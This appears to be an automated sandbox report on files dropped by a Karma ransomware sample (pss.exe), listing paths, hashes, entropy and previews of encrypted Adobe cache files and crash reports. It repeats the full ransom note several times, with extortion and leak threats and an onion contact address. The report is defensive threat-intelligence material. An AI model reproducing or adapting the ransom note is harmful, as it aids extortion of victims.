.lzH.......R(.d.b.)....Q..,J.Q.j...x.5.-.6...<.P.oG...D..9.........l.u...K.....)m.M..Uw|.q.$....x..vE.$.X:b.Ce.
C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):63667
Entropy (8bit):7.996620789477532
Encrypted:true
SSDEEP:1536:Fu1xQ3f2ILT3eoJ7dgnqzOd8lKYMvD+QG80HV8cTfPl:FJje6JtzOucDN+WI
MD5:B7B7CE3755BF0B308E333B67A5F9EBDD
SHA1:760278EFDE110FFEB6632E6D8FE44CD18ED8CCF1
SHA-256:545EDAEE693796F2B6C1854FA8DA54AAF72A59461F4C61D5E5E6BE21DFFF98E0
SHA-512:7B47D6BA0630D8B4AFAEB480CBFDEC0EAAC0B5B0994A82DB26DAC436359FD29C6E03E78B419FB80DD34EBB34D5DEDC9EBAEB48A83E9C406251C0FA576FAAD2BE
Malicious:true
Preview: .j.Ez..h.......>.y)...Z..Z(.=...,.4.T.](.rr...b.T.....L.f...KARMA.>.9...}toX...+..`..9>.=E....T.?~W...mO#Y.w..-.l<..1...F.,.XK...c..9.....A}.M....v..-./..J..........Y....q.0r.T..s.,.;..)?a..[M....K4@?0..]....T...!Y.2Gw].w.....4_6%.....[..Hr...MXf.A.?4E..f.L.t...H."..D.up.:4....W....d.......v.P.u.......-........vA.)>..^...]..l.....2Mh..Fl.7~.y&me7#r....,".,..X..w....O......l.N.)....n.z.j....\.S.N.7.y/R.4..B...F......#.d...W.......1....u.;%4..}().M+..[.=....Y...*.@.=......o.XB.............DA...L@'...@.O.....$.....4.kw.N..ht.f#.].~o.......X....k......|...M.....?' a....'.d..K.)!2.B..Z..&E..c.....!.b..O...z...G..|j....:...3.x^.2.....,^.D..e.........b...)...<.Z.bs,.b..-..>A...c..>8J.EjE.n_:.7.."....W.X.v.q....k(..Sxl?.X.O.fl.9..v...k<.We"Vp.G.....-...3.....AY{..=.T.b.d.4.HH.....0.l..Q....+A..... E...J.F./.!u.%.wd.>..l...~.c.p..$.E.*_.......N.[.-.....ND....mO.~.....!....;......6.."..Q.kf.. 2....D..#.. ..[.T.......e.z.L.r. ...2.
C:\Documents and Settings\user\Local Settings\Adobe\Color\ACECache11.lst.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):667
Entropy (8bit):7.7271977987515
Encrypted:false
SSDEEP:12:83g0djs8PKnM8np6k/BkbXDrxd8tibhueAWwUbrbspetdsb:83FY8PGnp6k/Bg8tCRwyKb
MD5:4C558D46A54E4FA0E189D1914FFECCE1
SHA1:357A1804950323DBDF39A619D94E374493768AC9
SHA-256:CA03CA6ABA9DAA9AD61C61409722613CE43F7DB61E8B7776FED1793DDA1C4AE4
SHA-512:E684C8055B624071C91227A2ECCDA58542AAA2031B57EF1F1E5182D50A0208AC6E8D19F1CE50772CFF56C6EE5044394F0EEADEF8D9E7BE965064ABD0E82DFF80
Malicious:false
Preview: ..l....z........8.......j.....+$...,x[..r...T6...k..0......KARMA.^...K..N...0@.(..8.......W...d...n.C.J...6..........} .P.....0...@..H...=.@.l..6..F|.....B..y.zGQ..xE*..C}0.3...}.L-.=8+...:.?...w..,.QV."...<.....g0A....^.VFd.j.A.<nhg....li..U{`.5.....Q.._.,q....8..e.E7|..X..4......E...h.oX.....Y.#=.SZa@/..<..R.p,.>k....#!..;...,.'.....ng...9.x<..WK.b...b=...~K.t.i.................'.&H.;L...I..../.q-...6.4.o.5@2+....._...1.*J..b.R".=..Rn.4...8.t...Vw".[V.... ........,...#`.i. v.].....#..C....b7G....w....Z!...1..m7.Mf.....\|..P.dW.I4M[.8.._.o.\.Q+k.O...E...@...r.+.Bq.i7w+u9B.....u..........8.D...........W.74...DZ...e.k'...w..
C:\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_pss.exe_9d9b9d6a0718e924eb0f095ee5cf1fb21b8932f_762fa7ba_011a2308\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8710
Entropy (8bit):3.766398432195196
Encrypted:false
SSDEEP:96:SQfyJaKNDYiithEP7RfdpXIQcQ7lc67YecEFcw30s+HbHg/8BRTf3Oy1Vs4oc/N5:XuDYoHFlfJP4VjuL/u7sXS274ItE1t
MD5:B8ADAD7536D8C778C6A58D0AD4495E55
SHA1:D8298777AEE593E14A5D7B967B07F93C8E5D435C
SHA-256:ACCDF4A261B819254D73BA790CD7CFE20FAE4E77BBCFCD7375454AE997E2E054
SHA-512:2DB3A3CB146640B2B6E11CB0AF79A1A0ABD9904F4AE0F6F8758A2363FC1E3EC7A82230335EF3F08A1EEB5FF164BA9E4F5E52C0A44015A6DC09E77F09824451D2
Malicious:true
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.3.8.5.1.6.5.7.0.3.9.2.4.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.3.8.5.1.6.5.7.6.9.5.4.9.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.3.1.6.b.2.9.a.-.4.0.6.0.-.4.1.5.7.-.8.3.5.e.-.7.5.2.f.b.0.1.c.6.d.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.f.4.3.4.8.b.-.d.1.1.f.-.4.5.4.d.-.8.f.a.0.-.c.8.2.e.b.a.c.7.9.d.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.s.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.e.0.-.0.0.0.1.-.0.0.1.7.-.4.9.9.6.-.c.b.3.a.f.a.9.4.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.1.5.b.6.6.9.a.0.f.5.c.9.0.9.8.8.5.e.1.c.7.9.4.2.7.2.e.2.e.7.5.0.0.0.0.f.f.f.f.!.0.0.0.0.b.3.9.6.a.f.f.d.4.0.f.3.8.c.5.b.e.6.e.c.2.f.c.1.8.5.5.0.b.b.f.c.9.1.3.f.c.7.e.a.!.p.s.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C32.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Thu Aug 19 13:00:57 2021, 0x1205a4 type
Category:dropped
Size (bytes):80230
Entropy (8bit):2.1464952898121417
Encrypted:false
SSDEEP:192:+gGgRuXMK1ow5/JUf/p73m4LL0xgdyaC5gOE4fi1ScN1KZi2Yxfhk31pMAiptWlF:DGbceomMOxgJC2OubNANYJy31OnpU3
MD5:D3C4974F11EE465F4C913E807E177413
SHA1:1114974B3E971A72B5D6CFA6606E55962B6D0728
SHA-256:5BE63D09C2CE7470EE94ECAA2D881721F00CF4C66235247D1F842BC54EAAE1E7
SHA-512:7AB74EB4E0158D8841677E04835D671FA0690631AD6D940E2555E35783009A3D2B98055884FCE644A919779CA1AF474B948D584C48F8C91B2D8CD2EE42ECD0B6
Malicious:false
Preview: MDMP....... ........V.a...................U...........B..............GenuineIntelW...........T............U.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D8B.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8248
Entropy (8bit):3.6897956266787553
Encrypted:false
SSDEEP:192:Rrl7r3GLNivK6FS6YSFSUwNkngmfMSvu0CpD489brYsfJ5m:RrlsNiS6A6YASUokngmfMSWBrLfG
MD5:71CFED0E648F13A285EDF874AD790585
SHA1:66069F3A009714852563E957CC1FF3B809B9A51A
SHA-256:81A081FEFB5B126B4F1E4494F001C217B9036D55E47146A15EBF9894E8853479
SHA-512:5D46BD6D7B6DBD297E556348040B76B7D8F755B64D1FEB49AE00B41C5B68F42975DE9558AE72B19481A9FB882C7CA33DAE3F5DC96E02BD67EEC6A58EECA9830E
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.9.6.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E57.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4514
Entropy (8bit):4.41806856427765
Encrypted:false
SSDEEP:48:cvIwSD8zsUJgtWI9TTWSC8BBF8fm8M4JQm2F1+q8MgKM24d:uITfS8iSN2JQ/ih24d
MD5:6B2921A729289D4384CE63E9474FD525
SHA1:F328D50F4BBFAF8E11BC5AAF53DA35F0DFB9070F
SHA-256:196251C9E1F1F2F626F02067FD70C555F3B7E56B592E77F2D6C1F0E451B7FF4B
SHA-512:A1EC614DB34DAFDBAF590B74202558B7891F3F7022D1D833DFC8AF3D89B776D26C84EB1067427D659D1096744060936049E315E094816334801B0172E9FAAB7B
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1128851" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\Users\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\3D Objects\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1104
Entropy (8bit):7.833501918420277
Encrypted:false
SSDEEP:24:TIVDAVPXXz0DnX99S2p/uTleXProN6wxEsfyD+Siri:TMIXXz0DX9bTXTCjtt1u
MD5:C075CBC6CD0DB76D0E54A50AAA7AD48E
SHA1:738FAD3E004732B245AAE9D5012E454BE9D59495
SHA-256:EB2E3A41F08BB097CF37F783D909C48DAE10E1307C5D6AB945E24B4FC3D3C26E
SHA-512:722390BE612354C468DB45A4E269A4C52FB7E2FC7ECD6535D5DF3ED4362615D14845EE851057CBA828D9CECA2BAC132A59AA7C373745F9992572631A59BCE470
Malicious:false
Preview: .5A1.......m.......e.2..........T=z.q...sG.:.=9.8.u.#...K9...KARMA@X.......R....&0....`..i.,e.....Z.G.......W.K|(....pB.'/...q....Z..h......(..-..<.1].$R.W......(b..$M..>.z..IO....#W.w.p...Y..i...:.P.C,.L..t.B.4.Y...n...Q.z....|..`..-..d.8.o./..3`l...U..M5CiB.{.X.w..)|..gX..w.p..a.f:....L...e.h.8......![.l../..nQ..R.?..g?G..._..r.#..-.-l...........<c.`.N.6.....h.8..A..Ne.....v..~.......:!.,...X........V.K.OG....^.W9......;SO.....%&.-j..w....\...0.0.....a......&\..&r...p|....&..s..".?+....P.O..kg...f.!_..K9.a.,^Cr.%...j..pN.J^$\...y.K)..K.e...i.X.%'...w4!.`..NN(.."...S.......!...n2....O... |p/1.BE9..:x.Q.2..+..^c/..F..^...c.....N.....N.........%=..[.`.a4..%.UK..n...z..=.!g(.O...B....s.:........k...j...t.*?.j)u......%.o..X.A..z....6.....U.p.."..2..X^.+..D......'&wO...6.7gd..D.k...s|..Y..1..g.m.dH... ..3x`)N*..kJ:...........C..H.....A..3".A...% .ta.J.;..z.b9...jA./.a3`.../.D+'.l..dk.....e2....O6ny.w.E..G....x.Qmz.X+......}..s...^......$V...)7.
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):157512
Entropy (8bit):7.998769086932829
Encrypted:true
SSDEEP:3072:VYbYGZFS+qnsQJceqsrL3vSBW9SGE9SQDWbvCwkTdXQ+9Yb1497oeW:UYC47Jf1OB4P16RxXz6JqoeW
MD5:9D0136E2E308B459CB942A489D9392E8
SHA1:63A030EF9EA19CF9163EB21EC024D401982E5082
SHA-256:9F9FFE46679B2F0EA9C9CAD878166A7F7F39AD8EA8AF4FAE5DA0F9FBA5335AA9
SHA-512:614DC08EACDA0BA4408B89630E9A6AED1A692AB23E801A5CDF83C935FF777A20DBD5CEE03EC8BB3E765A137B1D5AF4AEBDF4785325CAFEE76E225913FA42F5BF
Malicious:true
Preview: +...Z.....G..5.S.(.L..a.......\.WvE@.x..&......%..oHh\R.6...KARMA.........x......h....M.}.`S.cR........iB.[.:) .TsXD..e.O..rC.*.g.....nw...:..y....R.x............F......._..Qr. Y.BEc.:....U...8..d|9......i...owy.y.`f.......^.. ." .g.o[...%?..-vh{.9.......m.JId4........"..W...+..g...R...+B`R..h.-.f.=..3..G...F..o...MeFK&Z.j;....)..'..Q+...7].)....+..<.G'..)<.Q@\.;.U.<a..-.P...r...pV1...as..O;.'.?.}O.L(.+.fp../.k.|2..0.......h...Gghc.b..<.V.YP.&.HX.._.T.v8.g...-...#...a.......jm....uu...a.l...h....f...#0....EN7....rt..a_CF.,..R.X..#<....eW{...*..(..G........X.J....(..#.Y..........I.1b..}.."/._f..V..&.Cz>...L8X.y.mwU....!..0..<+.;;...Y.Q..~W.<..|._.....9.u.......%..........]..&X`.W....f..f..8...vzr.v7....~f]K@e>........N........J.n.)\.&j.xA.....H....U.x.(.b.2..SFQW.|7.Wx..<...r(WX..M`....0.n...Sp.....2.1.t.h... ...C.b-V[A..&...%...)....`SU.I.z..s..1Z.)..l{[|^.....W...-.lzjm."Z[.p.......Y..4d...........:z4.j....8.g.........3.
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):9635
Entropy (8bit):7.984063932308583
Encrypted:false
SSDEEP:192:dRV5fpfyYzk3YeykePTpkHmhbndqvyihLhUIs954TN68XvAJa59vy8:dn5cYzp7pKGbnd+hLoexX/
MD5:397745A92FF84000407BC3F2C9B56452
SHA1:AD80530BB8C6792D62DE80C59D236CDFEE1AC505
SHA-256:17A8C50ACB84800BA3DA2964614332DCCC85A8DC70B66C68C186657EEFA43E30
SHA-512:CFF6C0EE11888D54F966757387C9BD24A0609F1D1F7CC6DC18434E0AAF4327974550F0036FA62FE649EBA9DB3DF18BC0413E6FBD6316EBDB47AB179B0BAC75C9
Malicious:false
Preview: 6{..S..5TG....4...R..3-q.T....].d[n.CA+b.......B.'..r.......KARMA..!....j.M..<.......F.&._[.D..|...:.....~..X.j..xj.e...VP0F..Y....F..Ns.VT..]......i.C.."Te.P....P.m.;.3.......gt....Q.b..Jv...F.<>_*j'..*>tN6.4\V"9a.}A{hQ..U.y....,..G......5[..=.2m..ZJ&...-.0J..o}Y..G..Up......~.M.~.L{....lz.Gg.@(..w7`.r6..bJ.s*.f.%/.!...-'.>=..y.s.Y...`.~|..b=Lo[....y.qP...(.0O..GAkO.I.i.;....m.....^.......D..C 7..].G..<~I../n.=........")fh.../..vu]c.[....$.NKVx.....4.I....!q.]..Dg.|<pv....k......\.W.c...D0.a.v.\...~....m}...ZG......}.>.ja.....i.65.v...G......@.m3...0.p.A=...$....j..._...&....!.5Ps.ls.}.Z];Y...+.#)!...^..X..]5qX.?2.e..(.h. f....J.%...<..0....Q..U@.iO+.0=0..^n#....X..6%+.F.....F..J.....)O....'..Q{...?..?..8~1R.8e....N).^N).. .fr.Q...cv..(.:.3*..q7X.A..fP...0...O.Q.F.....L.w.....! ._..*6..R.9.%.}..0.Ib.1..._.G>,.Hn..yr.Y..j5Q.....p..N....A.K.oV..4...G......../....O.NU<.....T.*...$......f.g/s'br.q..dX$)....dt..0u...G.YU...m........J....'..EE.."
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):13596
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:46666666666R
MD5:A6FF770C7AFD807A563E15F97B28F316
SHA1:4806E8768B03797BC2DC26C70D35BEF60236978D
SHA-256:493945C22AD4529238DBA3176D598495B0716195FF3D4FBF6F0BD76230D53A37
SHA-512:FD11AAB07F6F58C1CC34F2E1BC16638270DA467906658C55608E94834EAC39FC244BC347CBA7EA040458E13CC82A5CA558030FCCDD61283ABB3A6C1F96A83BFB
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:PGP\011Secret Sub-key -
Category:dropped
Size (bytes):245257
Entropy (8bit):7.99918756717482
Encrypted:true
SSDEEP:6144:rCL7CI70kgVL7sYUyieBt2C/lFFw6fGQqFzev:E+IYkORKC/lsXLFw
MD5:09C721B665625F7FCAD0A39245F574EA
SHA1:2814AC28DC8EE86D7E6089DFA4B9A9E696F2C68C
SHA-256:EBDFAFDEF0A3A9588BC989C6EB25FE77938444D7A4D0648E0C718E96DEB31571
SHA-512:47A976A42B103A4A9A691C57066D33E7C6C579C798251B74278CABCF57B2C9CFFB8F8EAC9D089AAA063ADA7C08DDFD422E712DC8DEB09C3E895F3F0E33F05AC7
Malicious:true
Preview: ...m.....h......K.%.j..Y.N'0...iK....]....b..8<.w..d........KARMAS.....#...@T.x.>]]..^n/R;k...Zs...ym...0.....c-.6\_.........<.....?.>*.A....jU..+p....X..pA..u[..c.->.@..F.:.YmWqA.....+H..yS..>|u.y.y\.ED_...Z..3..>M.4.i._..2..3..A.......L.........x..F.../......~z........6..9....r..?2.9...tA...qo.Iz......^.@..@>Y&W.......P..jw.....s..D..c>.[..,O..v..V.lKVl..Q...E..C...Ty-.9I.a..k\+u.]==..z(S%..1..oK...V..K.....P..P......o~"N..Z.lDm...&S.D.B..R..2.......%n3+.I].3.r..L.Z.uj...H......IV.23?.7..%4g<.t2>...1t./_....+....+........LJ...SR...w......D...5.1.y.L#.....he.......9.6.D.jN.=4....D.*..T`;..-.,S..).y.n.].NRdM*.X....j..jD...1IN8.:.......u..O.].....]...K......{jl .{.o.*....s..&.r..@(..W..3...=.x.t..\j..r..P.....JqS.x.u0omy......H.@...S...KEU..".B.%b'.......d.Xc.r.1...r.?.Hyz..9k=.Q..7ef.a....;.....'sg&.&F.u....0........'.q....gl..?.?.#M...p..@.%Z]...Y..!l......1.H..!%.$....T...Q....... 6.?..- ...P..\.P...R...G.?.3]..1F.!.<......).. .n.
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):13596
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:46666666666R
MD5:A6FF770C7AFD807A563E15F97B28F316
SHA1:4806E8768B03797BC2DC26C70D35BEF60236978D
SHA-256:493945C22AD4529238DBA3176D598495B0716195FF3D4FBF6F0BD76230D53A37
SHA-512:FD11AAB07F6F58C1CC34F2E1BC16638270DA467906658C55608E94834EAC39FC244BC347CBA7EA040458E13CC82A5CA558030FCCDD61283ABB3A6C1F96A83BFB
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):12357
Entropy (8bit):7.985861124591946
Encrypted:false
SSDEEP:192:BnhMmmzAjR74li3+cdq3jF3T/9smDxNka74seUulWiEzS8yFn18R7vpo0Usmq:BnLmsjREliOcM3BsmDx2OXlYU0nq
MD5:67A2226F3D675963F6C4F0872FCFAEB8
SHA1:35956D1D6DA69147803AED5EBFAE5E75CCAA55C0
SHA-256:921CD359D0D81C2C9FF87AEFCD30DD4F21A96590889D2B72C9CAD283C4175001
SHA-512:22E5FCC7053DD294B2E500C42D8E3FA9DA9FA4BC385E40801E434E382AA02C2F924FD3D5E2A61F493DE539C5FED8CCEB0A46CC7DF451FDD2530101547DD5E609
Malicious:false
